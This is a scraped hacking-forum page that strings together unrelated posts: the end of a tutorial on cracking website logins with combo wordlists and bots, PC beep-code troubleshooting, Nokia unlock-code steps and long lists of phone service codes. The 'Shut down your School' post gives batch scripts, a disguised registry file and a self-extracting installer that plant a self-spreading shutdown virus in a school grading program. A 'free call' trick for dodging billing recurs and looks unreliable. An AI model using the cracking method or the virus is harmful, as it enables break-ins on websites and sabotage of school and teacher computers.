When it is done you will have currently good passwords and bad passwords. Either way they are we still want to export them to a list. ShiftF6 when they are all still selected and it will let us export only the logins (not the urls) to a file to use as a wordlist. Once that is done. Opening the file into raptor is a good way to remove the duplicate logins and save it again. Now go to the Dictionary tab and click the middle button (Load a combo file) and laod it. Now click on Standard at the top and it will try to crack the captainstabbin website. Just under the server text box is a slider to add or recude bots. Try it on 25 and if its going good (401 access denied is normal) set it to 40... Wait and enjoy your new life...

If you are looking for an exciting place to crack, irc.thundercity.net in the #ASP channel is a good place to start.

_________________
----------------------------------------------------------------------------------------------------------
The Dream Is Not What You See In Sleep......Dream Is Which Does Not Let You Sleep
----------------------------------------------------------------------------------------------------------

Report this post
Top    
 Profile Send private message 
Reply with quote 

Display posts from previous:  Sort by 
Post new topic Reply to topic Quick reply      Page 1 of 1
     [ 1 post ]     
Quick reply
Smilies
:bananaelectric: :beg: :cheeky: :confused: :coolguy: :crybye: :derisive: :dizzy: :exclaim: :fie: :frown: :frustrated: :furious: :good: :hi: :jump: :love: :nyam: :scare: :stop: :surprised: :tongue: :wave: :wink: :wizard: :yahoo: :acute: :applaud: :bad:
View more smilies
   
Font size:
   
#000000     #000040     #000080     #0000BF     #0000FF
#004000     #004040     #004080     #0040BF     #0040FF
#008000     #008040     #008080     #0080BF     #0080FF
#00BF00     #00BF40     #00BF80     #00BFBF     #00BFFF
#00FF00     #00FF40     #00FF80     #00FFBF     #00FFFF
#400000     #400040     #400080     #4000BF     #4000FF
#404000     #404040     #404080     #4040BF     #4040FF
#408000     #408040     #408080     #4080BF     #4080FF
#40BF00     #40BF40     #40BF80     #40BFBF     #40BFFF
#40FF00     #40FF40     #40FF80     #40FFBF     #40FFFF
#800000     #800040     #800080     #8000BF     #8000FF
#804000     #804040     #804080     #8040BF     #8040FF
#808000     #808040     #808080     #8080BF     #8080FF
#80BF00     #80BF40     #80BF80     #80BFBF     #80BFFF
#80FF00     #80FF40     #80FF80     #80FFBF     #80FFFF
#BF0000     #BF0040     #BF0080     #BF00BF     #BF00FF
#BF4000     #BF4040     #BF4080     #BF40BF     #BF40FF
#BF8000     #BF8040     #BF8080     #BF80BF     #BF80FF
#BFBF00     #BFBF40     #BFBF80     #BFBFBF     #BFBFFF
#BFFF00     #BFFF40     #BFFF80     #BFFFBF     #BFFFFF
#FF0000     #FF0040     #FF0080     #FF00BF     #FF00FF
#FF4000     #FF4040     #FF4080     #FF40BF     #FF40FF
#FF8000     #FF8040     #FF8080     #FF80BF     #FF80FF
#FFBF00     #FFBF40     #FFBF80     #FFBFBF     #FFBFFF
#FFFF00     #FFFF40     #FFFF80     #FFFFBF     #FFFFFF
 

Board index » ..:: CT Hacking Club ::.. » : : Hacking Tutorials : :

All times are UTC

        Who is online            

Users browsing this forum: rakh00007 and 2 guests

    You can post new topics in this forum
You can reply to topics in this forum
You can edit your posts in this forum
You can delete your posts in this forum

Search for:
   
Jump to: 
CyberTerrorists.Net © 2008 - 2009
Powered by phpBB
cats.cd Downloads Downloads Downloads

Affiliates

| WarWolfz | Games-For-Gamers | DedicatedHackers | HackGyan | Anarchy-Hackers |

Some Problem In System

1. MONITOR LED IS BLINKING
Check all the connections like Monitor Cable, Data cables,RAM, Display Card , CPU connections.

2. CONTINUOS THREE BEEPS
Problem in RAM Connection.

3. THREE BEEPS ( 1 Long 2 Short)
Problem in Display Card Connection

4. THREE LONG BEEPS PERIOD WISE
Problem in BIOS or RAM (Basic Input Output System)

5. CONTINUOS NON-STOP BEEPING
Key Board Problem (I.e.; Some Key is pressed for Longer time)

6. FDD LED IS GLOWING CONTINUOSLY
Data cable to be connected properly (twisted cable).

7. NO DISPLAY ON THE SCREEN AT ALL
Hard Disk cable connected wrongly. Connect rightly seeing the Red mark (Faces power supply) and then Restart.

8. POWER LED IS OFF
a. Check main power cord
b. Check S.M.P.S.
c. Check Mother Board connection

9. SHOWING CMOS ERROR
Replace 3 Volt battery of Mother Board . Set Original Settings Manually.(Refer CMOS Setup chart)
Enter your search termsSubmit search form

10. SHOWING FDD ERROR OR FLOPPY DRIVE IS NOT WORKING PROPERLY
Check Power cord of FDD , Data Cables , set CMOS & Finally the Check drive.

11. SHOWING HDD ERROR OR HARD DISK FAILURE
a. Check Power Cord
b. Check connection of HDD
c. Check Data cable
d. Check Hard Disk parameters in CMOS or Auto detecting Setting Partitions by Fdisk Command, then format it to set track 0.

12. MOTHER BOARD HANGS DUE TO UNSTABILIZED POWER SUPPLY
a. Check S.M.P.S
b. RAM not functioning properly.
c. Software problem (due to using pirated software)
d. CPU fan not functioning properly.

13. DANCING SCREEN
a. Check Display card connection
b. Virus Problem
c. Video Memory Problem

14. SHAKING SCREEN
a. Earthing problem
b. Magnetic waves comes around.

15. CPU CABINET SHOCK
a. Check Earthing
b. Check main power cord.

16. NON-SYSTEM DISK ERROR
a. Floppy Drive having different disk (Non-Bootable Disk) OR CMOS Parameters for Hard Disk may not be set properly.
b. Hard Disk Partitions may not be created.
c. Hard Disk may not be formatted.

7. MISSING OPERATING SYSTEM
The System files missing namely Ie; command.com} - User File IO.SYS & MS_DOS.SYS } - Hidden Files. These above three files required for Start up of the system that can be transferred by using SYS C: Command OR While the time of formatting by using Format c:/u/s

18. MISSING COMMAND INTERPRETOR
May the file Command.com is corrupted OR Infected by Virus OR Some one has Erased it.

19. SHOWING I/O ERROR
a. The type of Hard Disk in CMOS may not be set properly.
b. Operating system used for formatting is not valid

20. SHOWING DIVIDE OVER- FLOW MESSAGE
a. May some Directories or Files crash with other files.
b. Use CHKDSK/F or SCANDISK Command to correct it.


21. HARD DISK MAKING NOISE WHILE PROCESSING
a. Unstabilized power supply.
b. Check for Loose Contact.
c. Do not use Y Connectors for Hard Disk.
d. It may create Bad Sector OR Weak Hard Disk.

22. HARD DISK HANGS WHILE PROCESSING
Check for Bad Sector by using CHKDSK or SCANDISK Command. If found format the Hard Disk and set Partition before that area.
(This is the only procedure to use Hard Disk with Bad Sector) OR (To avoid Bad Sectors use Standard Power Supply)

23. HARD DISK NOT DETECTED
a. Check Power Connector
b. Check Data Cables
c. Check Jumpers

24. PARTITION NOT SHOWN
Operating System where the Hard Disk formatted is not supported with present Mother Board. For Eg: Hard Disk formatted with Pentium System will hide their partitions for 486 System.

25. MMX/DLL FILE MISSING
May the above files may be corrupted due to power failure or Virus. Make available above files from other Computer. OR Reinstall Windows 98 Operating System. (This procedure will not make any effect on existing Data).

26. WINDOWS REGISTRY ERROR
This will happen due to sudden ON/OFF of the system. Final solution is to Reinstall Operating System.

27. DISPLAY COLOUR DOES NOT MATCH
a. Configure Display Card properly with their CD.
b. The Standard setting for Windows is set it to 800x600 for better performance.

28. UNKNOWN DEVICE FOUND
May the Driver utility is not provided with operating system . Insert Driver CD and install software for the above Device. (Every Device requires driver utility to set active)[/b]

Shut down your School!!

This article is for only educational purpose, i am not responsible for any misuse of this article.


By using this command you can shutdown your school or college by using only Note pad.

This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
"You have been hacked!"
Save this as shutdown.bat, making sure you choose all files as the filetype.


Step 2
Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don't feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.
http://www.mutantsrus.com/Update.reg


Step 3
Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.

Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti

Here is the code:


@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit

Save this as global.bat


Step 4
They grow up so fast -- real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user's hard drive and remain there.


@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.



Step 5
The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat

Save as cure.bat

@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe

Step 6
The SetupNo it's not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to "tools", then select "convert archive to SFX". Click "Advanced SFX Options" In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)

_________________

Unlock your nokia

Now Anyone can now calculate their own DCT4 Nokia unlock codes, and Unlock their Nokia Cell phones.
Why?
If you unlock your phone then you can go to a different provider with the same phone.
 This is usually something for the people with tri-band phones.
 Some take it out of the country and use the phone with the local sim card provider.
  You can now buy phones off ebay, and won't have to pay someone $$ to unlock it for you.
{mos_sb_discuss: 18}
It has been released for free!! Anyone can now calculate their own  DCT4 Nokia unlock codes. Download CyberGSM and Hollowmans software HERE! (this is their latest release 1.4). Cyber's software seems to work on all Windows operating systems including XP! Also it is the most stable and user friendly!

To calculate the correct unlock code you will need to enter into the software three pieces of information
 about your locked phone:

1) Lock type:
This is either 2 or 5. Always select 2 unless your handset is a 7650, 3650, 3660 N-gage, 6600 in which case select 5.

2) IMEI
The 15 digit serial number of your handset. This can be found by pressing *#06# into your handset.

3) Network provider
This refers to the network your handset is locked too. For UK providers
Orange  = 23433
T-Mobile = 23430
Vodafone = 23415
O2 = 23410
Virgin = 23400 (although can vary from handset to handset)

The latest version of Cybers software makes selecting the correct network code very easy indeed!
 Just select the network your handset is locked to using the drop down listboxes.

You can view a page containing a complete world wide list for all network provider codes HERE. (thanks to Yeldar)
Ready?
Step 1
Unzip cyber & hollowmans software and double click the file named: DCT4 Calculator 1.4.exe

Step 2
Complete the IMEI field, and then select the country and network your handset is locked too using the drop down list boxes. Now you need to select a lock type: either 2 or 5. Always leave this as type 2 UNLESS the phone you want to unlock is a 7650 or 3650 in which case select type 5. You will also See a check box - make sure this REMAINS checked (as this means the software will calculate the latest version 2 codes not the older less reliable version 1 codes) See the screen shot below!
 The program will produce a set of 7 codes, something like those below:
#pw+378826702640327 +1#
#pw+294365624205166 +2#
#pw+843021176162422 +3#
#pw+444037775262334 +4#
#pw+494237425204736 +5#
#pw+733110464133112 +6#
#pw+145234270304737 +7#

Any one of the 7 codes codes will probably unlock your phone but I normally use Code 7 first,
 if that does not work then code 1 and on the rare occasion they both fail I try code 5.

Step 3
Now enter code 7 into your phone with NO sim card in!

To access "p" just press "*" three times within one second. To access "w" press "*" four times within one second.
To access button "+" you have to press twice "*" within less than a second.

If successful you will see the message 'Phone restriction off' (if not you will get a 'code error' message).

THAT'S IT, YOUR PHONE IS UNLOCKED! ITS THAT SIMPLE!!

IF YOU HAVE 3 FAILED ATTEMPTS AT ENTERING IN THE CODE (I.E YOU SEE "CODE ERROR" 3 TIMES)
 THEN STOP AND PLACE YOUR DETAILS ON MY FORUM.




Warning and Tips!!!
If the unlock code has been entered incorrectly 5 times or more then upon entering in further codes the phone will display "cannot undo restriction" (or "Not Allowed" for Symbian phones - 7650 / 3650 / N-Gage) message instead of "code error". If you see the "cannot undo restriction" or "Not Allowed"  message then only a proffesional unlocker can help you by using an expensive cable soloution!

If the code does not work after a couple of tries:

1) Double check you have entered the correct IMEI - press *#06# into the handset to display your IMEI. (many people type a digit in wrong)
2) Double check what network the handset is locked too and your network code.
3) Make sure your phone is not already unlocked! sounds daft but some people just don't know what they are doing!

To check if your phone is locked,
 insert a foreign sim into the handset. (i.e. a sim that the handset will not accept)
 - the phone should display  something like 'enter restriction code' - if you do not see this then your phone is not locked!

If Your phone is already unlocked you will always get code error regardless if you enter the correct code or not!!!

As mentioned earlier, to prevent dissapointment please post your details on my forum if you have 3 failed attempts.

NB.
 Do not worry, you CAN NOT damage your phone by entering the incorrect code more than 5 times!
 Its just that you will not be able to unlock it even with a correct code if you have!
 So unlocking by codes is very safe! :-)

Mobile Secret Codes:

C25:

SP unlock *#0003*(secret code 8 digits)#

*#0606# shows you Secret Code, but only without SIM Card.

*#06# for checking the IMEI (International Mobile Equipment Identity)

Resets language to automatic selection : * # 0000 # then Green button

Pin Out (electrical connections)

1- GND
2- SB
3- POWER
4- NC
5- TX
6- RX
7- CLOCK
8- DATA
9- GND MIC
10- HF MIC
11- AUDIO
12- GND AUDIO


Languages:

*#0000#+green phone - choose automaticaly
*#0001#+green phone - English
*#0030#+green phone - Greek
*#0031#+green phone - Netherlands
*#0032#+green phone - French
*#0034#+green phone - Spanish
*#0039#+green phone - Italian
*#0049#+green phone - German
*#0090#+green phone - Turkish

How to change PIN:

**04*old PIN*new PIN*new PIN#

How to check simlock status

*#0606# and then press left soft-key, you will see strange characters, then text ("brak

blokad"). If you see for example 260-02, it means the phone is locked to Era GSM. In older

models you can use *#06# and see the same information after clicking on left key (you will

see IMEI and software version).


S4:

Monitor Mode - how to activate:

Press left soft-key, then 9 (SET UP) 8 (Phone Status). You will see IMEI number, then press

left soft-key and in order 7684666 and red phone at the end (monitor mode has been

activated). To read information from Monitor Mode - press left soft-key, then 5 (GSM

SERVICE) and 6 (Monitor). Monitor mode turns off when you switch off the phone. You must

activate it again if you want.

How to see date of software:

Press left soft-key, then 9 (SET UP) 8 (Phone status). You will see IMEI number, then press

twice left soft-key, 98, left soft-key, 7684666, red phone (activates Monitor Mode), left

soft-key, 56 (turns on Monitor Mode), left soft-key, 98, left soft-key, 7684666, hang up

(red phone) >abck to "normal" and then left soft-key, 56.

S6, S8:

If you add to phonebook under 'own phone number' +12022243121 with namez (for example MMI),

then you will see something smile.gif

S10, E10:

In phonebook enter +12022243121 as your own phone no. You will see a picture with sun, two

palms and greetings.

S15e:

Monitor Mode:

Code: *#7436267*8378# (*#SIEMENS*TEST#)
Hold red phone button until it code disapears.
Menu 3.3.4 Choose frequency.
Menu 3.3.4.1 Automaticaly.
Menu 3.3.4.2 Choose GSM-900
Menu 3.3.4.3 Choose GSM-1800

Menu 10.1 MS info
Menu 10.2 Soft date
Menu 10.2.1 Software version.
Menu 10.2.2 EEProm version.
Menu 10.3 Tst and product info.
Menu 10.3.1 Handware data.
Menu 10.3.2 Date of manufacture
Menu 10.3.3 Service date
Menu 10.3.4 Date of repair.


S25:

Enhanced Full Rate
*#3370# turns on
#3370# turns off

Haft Rate Mode
*#4720# turns on
#4720# turns off.

Languages:

*#0000#+green phone - choose automaticaly
*#0001#+green phone - English
*#0030#+green phone - Greek
*#0031#+green phone - Netherlands
*#0032#+green phone - French
*#0034#+green phone - Spanish
*#0039#+green phone - Italian
*#0049#+green phone - German
*#0090#+green phone - Turkish

How to change PIN2?

**04*old PIN2*new PIN2*new PIN2#

What is my software version?

Menu 8-8-2 press left-softkey when you see IMEI number, or *#06# and then green phone

button and then press left soft-key.

How to extend battery life:

IrDA - turn on only when you need.
Turn off automatic network search (6-3)Turn off Vibration alarm.

SP unlock *#0003*(secret code 8 digits)#

*#0606# shows you Secret Code, but only without SIM Card.

*#06# for checking the IMEI (International Mobile Equipment Identity)

Resets language to automatic selection : * # 0000 # then Green button



S25, M35, S35, C35

SP unlock *#0003*(secret code 8 digits)#

*#0606# shows you Secret Code, but only without SIM Card.

*#06# for checking the IMEI (International Mobile Equipment Identity)

Resets language to automatic selection : * # 0000 # then Green button






Secret Codes Of Nokia Mobiles:


Below we present secret codes of nokia mobile phones which are very useful for people who

unlock phones and for amateurs of this topic. These special key sequences entered

fromkeyboard of phone allow you to get some important information like IMEI number, release

date, software version and much more. You can also choose default language,

activatenetmonitor ect.


1610/1630

*#170602112302# (software version)

1610/1611

IMEI number: -*# 0 6 #
Software version: -* # 1 7 0 6 0 2 1 1 2 3 9 2 #
Simlock status: - # 9 2 7 0 2 6 8 9 #


2110

*#9999# (software version)

2110i/2110e

*#170602112302# or (depends on model)*#682371158412125# (software version)


NOKIA3110

*#06# -IMEI

*#3110# -Software version

##002# - allows to turn off voice mail.

*#7780# - restore factory settings

*#746025625#(or *#sim0clock#) - to check if clock of sim (SIM-Clock) can be stopped (SIM-

Clock-stop is akind of standby mode which saces battery)

*#92702689# (or *#war0anty#) -"warranty code:"- you have to enter one of the following

codes:

6232 (OK)displays month and year of production date (ie "0198")

7332 (OK) - displays date of last repair - if there is (ie. "DATE NOT SAVED")

7832 (OK) - displays date of purchase - if there is (ie. "DATE NOT SAVED")

9268 (OK) -displays serial number

37832 (OK) -sets purchase date in format MMYY (MM - month, YY - year)- attention: you can

set it only once, so beware !

87267 (OK)-displays message "Confirm Transfer?" - meaning is unknown (?)

* # 9 2 7 0 2 6 8 9 # -Simlock info

*#31# (call) -sets if your phone no. will be hidden or not (works only in some networks)

*#76# (call) -sets if target phone number when you call should be displayed (works only in

some networks)

*#77# (call) -(work s only in some networks)

*#33/35# (call -displays message "Service not active".

**31# (call) -your no. will not be showed to others when you make a call



3210


*#06# -IMEI

*#0000# -software version

*#92702689# (or *#war0anty#)- enters service mode.

*3370# -Turns on sound encoding system - Enhanced Full Rate.


#3370# -Turns off sound encoding system Enhanced Full Rate .

*4720# -Turns on battery save mode - saves about 30 % of energy.

#4720# -Turns off battery save mode.

xx# -Replace xx with desired phonebook entry - press # and you will see it on display.


51XX


*#06# -IMEI

*#0000# - Software version

*#92702689#( or *#war0anty#) Enter service mode.

*3370# -Turns on sound encoding system - Enhanced Full Rate.

#3370# -Turns off sound encoding system - Enhanced Full Rate.

*4720# -Turns on battery save mode - saves about 30 % of energy.

#4720# -Turns off battery save mode.

#pw+1234567890+1 -provider lock status

#pw+1234567890+2 -Network lock status

#pw+1234567890+3 -Provider lock status

#pw+1234567890+4 - SimCard lock status


NOKIA 61XX


*#06# -IMEI

*#0000# ;-*#99 99# (Nokia 6130)


*#92702689# (or *#war0anty#) Software versionEnter service mode.

*3370# -Turns on sound encoding system - Enhanced Full Rate.

#3370# -Turns off sound encoding system - Enhanced Full Rate.

*4720# -Turns on battery save mode - saves about 30 % of energy.

#4720# -Turns off battery save mode.


NOKIA8810


*#06# - IMEI

*#0000# -Software version

*#92702689# (or *#war0anty#) Enter service mode.

*3370# -Turns on sound encoding system - Enhanced Full Rate.

#3370# -Turns off sound encoding system - Enhanced Full Rate.

*4720# -Turns on battery save mode - saves about 30 % of energy

#4720# -Turns off battery save mode - saves about 30 % of energy



NOKIA99OO


*#06# -IMEI

*#682371158412125# -Software version

*#3283# -Displays week and year of manufacture, ie. 1497 means 14th week of 1997.



NOKIA 911O


*#06# IMEI


*#0000# SOFTWARE VERSION

*3370# Turns on sound encoding system - Enhanced Full Rate.

#3370# Turns off sound encoding system - Enhanced Full Rate.

*4720# Turns on battery save mode - saves about 30 % of energy.

#4720# Turns off battery save mode.



NOKIA 81XX


*#06# IMEI
*#8110# Software version
xx# Replace xx with desired phonebook entry - press # and you will see it on display

*#92702689# (or *#warOanty#)

"Warranty code:" - you have to enter one of the following codes:

9268 (OK) displays IMEI (International Mobile Equipment Identification)

6232 (OK) displays date of manufacture in format MMYY (MM - month, RR - year)


7832 (OK) displays date of purchase

7332 (OK) displays date of repair or upgrade

37832 (OK) sets date of purchase in format MMYY (MM - month, RR - year) - attention: you

can set it only once, so beware !!!

87267 (OK) transmits user data/move data do service PC




Motorola Codes:



Motorola 920
---------------


Press menu and type one of these numbers and press OK:

11 = Status Review
13 = Available Networks
14 = Preferred Networks
22 = Select Keypad Tones
25 = Require SIM Card PIN
26 = Language Selection
32 = Repetitive Timer
33 = Single Alert Timer
34 = Set IN-Call Display
35 = Show Call Timers
36 = Show Call Charges
37 = Call Charge Settings
38 = Reset All Timers
43 = Reset All Timers
45 = Show Last Call
46 = Total For All Calls
47 = Lifetime Timer
51 = Change Unlock Code
52 = Master Reset
53 = Master Clear (Warning!! May result in deleting the Message Editor!!!)
54 = New Security Code
55 = Automatic Lock
63 = Battery Saving Mode

Free call tip

1 Enter the phone number
2 Enter OK
3 Type *#06#
4 Press Button C
5 And finally press the button for power off.

You should now be able to talk without being billed.


The 54# Tip:

Type 1#, 2#........54# on the keypad (when you're not in the menu) to get the phone number

used for with this key when speed dialing.





Motorola 930
--------------


Press menu and type one of these numbers and press OK:

11 = Status Review
13 = Available Networks
14 = Preferred Networks
22 = Select Keypad Tones
25 = Require SIM Card PIN
26 = Language Selection
32 = Repetitive Timer
33 = Single Alert Timer
34 = Set IN-Call Display
35 = Show Call Timers
36 = Show Call Charges
37 = Call Charge Settings
38 = Reset All Timers
43 = Reset All Timers
45 = Show Last Call
46 = Total For All Calls
47 = Lifetime Timer
51 = Change Unlock Code
52 = Master Reset
53 = Master Clear (Warning!! May result in deleting the Message Editor!!!)
54 = New Security Code
55 = Automatic Lock
63 = Battery Saving Mode

Free call tip

1 Enter the phone number
2 Enter OK
3 Type *#06#
4 Press Button C
5 And finally press the button for power off.

You should now be able to talk without being billed.


Motorola 930

The 54# Tip:

Type 1#, 2#........54# on the keypad (when you're not in the menu) to get the phone number

used for with this key when speed dialing.





Motorola 6200
--------------



(Note: pause means the * key held in until box appears)
To activate RBS type: [pause] [pause] [pause] 1 1 3
[pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng
Field Options' function with the keys, and enable it.

De-activate RBS

To de-activate RBS type: [pause] [pause] [pause] 1 1 3
[pause] 0 [pause] [ok]
This only works with some versions of software.

These countries has been reported working:

UK (Orange)
AU

What's the use of RBS:

Get Distance From Base Station - Place a call, when it
is answered, press [MENU] until 'Eng Field Option' is
displayed, press [OK], select 'Active Cell', press [OK],
press [MENU] until 'Time Adv xxx' appears, where xxx is
a number. Multiply this number by 550, and the result is
the distance from the RBS (Radio Base Station), in
meters.

Get Signal Quality - press [MENU] until 'Eng Field
Option' is displayed, press [OK], select 'Active Cell',
press [OK], press [MENU] until 'C1' appears. This is the
signal quality. If it becomes negative for longer than 5
seconds, a new cell is selected.

Pin Outs

Numbered left to right, keypad up, battery down

1. Audio Ground
2. V+
3. True data (TD) (input)
4. Downlink - Complimentary data (CD) (input)
5. Uplink - Return data (RD) (output)
6. GND
7. Audio Out - on/off
8. Audio In
9. Manual Test - ???
10. Battery Feedback
11. Antenna connector






Motorola 7500
-------------



(Note: pause means the * key held in until box appears)
To activate RBS type: [pause] [pause] [pause] 1 1 3
[pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng
Field Options' function with the keys, and enable it.

De-activate RBS

To de-activate RBS type: [pause] [pause] [pause] 1 1 3
[pause] 0 [pause] [ok]
This only works with some versions of software.

These countries has been reported working:

IT (model: F16 HW: 5.2 SW: 2.1)


What's the use of RBS:

Get Distance From Base Station - Place a call, when it
is answered, press [MENU] until 'Eng Field Option' is
displayed, press [OK], select 'Active Cell', press [OK],
press [MENU] until 'Time Adv xxx' appears, where xxx is
a number. Multiply this number by 550, and the result is
the distance from the RBS (Radio Base Station), in
meters.

Get Signal Quality - press [MENU] until 'Eng Field
Option' is displayed, press [OK], select 'Active Cell',
press [OK], press [MENU] until 'C1' appears. This is the
signal quality. If it becomes negative for longer than 5
seconds, a new cell is selected.

Pin Outs
Numbered right to left, keypad up, battery down looking

1. Gnd
2. Pos
3. True data (TD) (input)
4. Complimentary data (CD) (input)
5. Return data (RD) (output)
6. Audio gnd
7. Audio out
8. Audioin




Motorola 8200
--------------



(Note: pause means the * key held in until box appears)
To activate RBS type: [pause] [pause] [pause] 1 1 3
[pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng
Field Options' function with the keys, and enable it.

De-activate RBS

To de-activate RBS type: [pause] [pause] [pause] 1 1 3
[pause] 0 [pause] [ok]
This only works with some versions of software.

These countries has been reported working:

ES, AU, NL, BE


What's the use of RBS:

Get Distance From Base Station - Place a call, when it
is answered, press [MENU] until 'Eng Field Option' is
displayed, press [OK], select 'Active Cell', press [OK],
press [MENU] until 'Time Adv xxx' appears, where xxx is
a number. Multiply this number by 550, and the result is
the distance from the RBS (Radio Base Station), in
meters.

Get Signal Quality - press [MENU] until 'Eng Field
Option' is displayed, press [OK], select 'Active Cell',
press [OK], press [MENU] until 'C1' appears. This is the
signal quality. If it becomes negative for longer than 5
seconds, a new cell is selected.

Pin Outs

Numbered right to left, keypad up, battery down looking

1. Audio Ground
2. V+
3. True data (TD) (input)
4. Downlink - Complimentary data (CD) (input)
5. Uplink - Return data (RD) (output)
6. GND
7. Audio Out - on/off
8. Audio In
9. Manual Test - ???
10. Battery Feedback
11. Antenna connector





Motorola 8400
-------------



(Note: pause means the * key held in until box appears)
To activate RBS type: [pause] [pause] [pause] 1 1 3
[pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng
Field Options' function with the keys, and enable it.

De-activate RBS

To de-activate RBS type: [pause] [pause] [pause] 1 1 3
[pause] 0 [pause] [ok]
This only works with some versions of software.

These countries has been reported working:

ES, AU, NL, BE


What's the use of RBS:

Get Distance From Base Station - Place a call, when it
is answered, press [MENU] until 'Eng Field Option' is
displayed, press [OK], select 'Active Cell', press [OK],
press [MENU] until 'Time Adv xxx' appears, where xxx is
a number. Multiply this number by 550, and the result is
the distance from the RBS (Radio Base Station), in
meters.

Get Signal Quality - press [MENU] until 'Eng Field
Option' is displayed, press [OK], select 'Active Cell',
press [OK], press [MENU] until 'C1' appears. This is the
signal quality. If it becomes negative for longer than 5
seconds, a new cell is selected.

Pin Outs

Numbered right to left, keypad up, battery down looking

1. Audio Ground
2. V+
3. True data (TD) (input)
4. Downlink - Complimentary data (CD) (input)
5. Uplink - Return data (RD) (output)
6. GND
7. Audio Out - on/off
8. Audio In
9. Manual Test - ???
10. Battery Feedback
11. Antenna connector





Motorola 8700
--------------



*#06# for checking the IMEI (International Mobile Equipment Identity)

Activate RBS

(Note: pause means the * key held in until box appears)
To activate RBS type: [pause] [pause] [pause] 1 1 3
[pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng
Field Options' function with the keys, and enable it.

De-activate RBS

To de-activate RBS type: [pause] [pause] [pause] 1 1 3
[pause] 0 [pause] [ok]
This only works with some versions of software.

These countries has been reported working:

AU, IT, SG, DE, ES, ZA

What's the use of RBS:

Get Distance From Base Station - Place a call, when it
is answered, press [MENU] until 'Eng Field Option' is
displayed, press [OK], select 'Active Cell', press [OK],
press [MENU] until 'Time Adv xxx' appears, where xxx is
a number. Multiply this number by 550, and the result is
the distance from the RBS (Radio Base Station), in
meters.

Get Signal Quality - press [MENU] until 'Eng Field
Option' is displayed, press [OK], select 'Active Cell',
press [OK], press [MENU] until 'C1' appears. This is the
signal quality. If it becomes negative for longer than 5
seconds, a new cell is selected.





Motorola CD 160
---------------



Press menu and type one of these numbers and press OK:

11 = Status Review
13 = Available Networks
14 = Preferred Networks
22 = Select Keypad Tones
25 = Require SIM Card PIN
26 = Language Selection
32 = Repetitive Timer
33 = Single Alert Timer
34 = Set IN-Call Display
35 = Show Call Timers
36 = Show Call Charges
37 = Call Charge Settings
38 = Reset All Timers
43 = Reset All Timers
45 = Show Last Call
46 = Total For All Calls
47 = Lifetime Timer
51 = Change Unlock Code
52 = Master Reset
53 = Master Clear (Warning!! May result in deleting the Message Editor!!!)
54 = New Security Code
55 = Automatic Lock
63 = Battery Saving Mode

Free call tip

1 Enter the phone number
2 Enter OK
3 Type *#06#
4 Press Button C
5 And finally press the button for power off.

You should now be able to talk without being billed.





Motorola CD 520
----------------



Press menu and type one of these numbers and press OK:

11 = Status Review
13 = Available Networks
14 = Preferred Networks
22 = Select Keypad Tones
25 = Require SIM Card PIN
26 = Language Selection
32 = Repetitive Timer
33 = Single Alert Timer
34 = Set IN-Call Display
35 = Show Call Timers
36 = Show Call Charges
37 = Call Charge Settings
38 = Reset All Timers
43 = Reset All Timers
45 = Show Last Call
46 = Total For All Calls
47 = Lifetime Timer
51 = Change Unlock Code
52 = Master Reset
53 = Master Clear (Warning!! May result in deleting the Message Editor!!!)
54 = New Security Code
55 = Automatic Lock
63 = Battery Saving Mode

Free call tip

1 Enter the phone number
2 Enter OK
3 Type *#06#
4 Press Button C
5 And finally press the button for power off.

You should now be able to talk without being billed.





Motorola d460
--------------



#06# for checking the IMEI (International Mobile Equipment Identity)

Activate RBS

(Note: pause means the * key held in until box appears)
To activate RBS type: [pause] [pause] [pause] 1 1 3
[pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng
Field Options' function with the keys, and enable it.

De-activate RBS

To de-activate RBS type: [pause] [pause] [pause] 1 1 3
[pause] 0 [pause] [ok]
This only works with some versions of software.

What's the use of RBS:

Get Distance From Base Station - Place a call, when it
is answered, press [MENU] until 'Eng Field Option' is
displayed, press [OK], select 'Active Cell', press [OK],
press [MENU] until 'Time Adv xxx' appears, where xxx is
a number. Multiply this number by 550, and the result is
the distance from the RBS (Radio Base Station), in
meters.

Get Signal Quality - press [MENU] until 'Eng Field
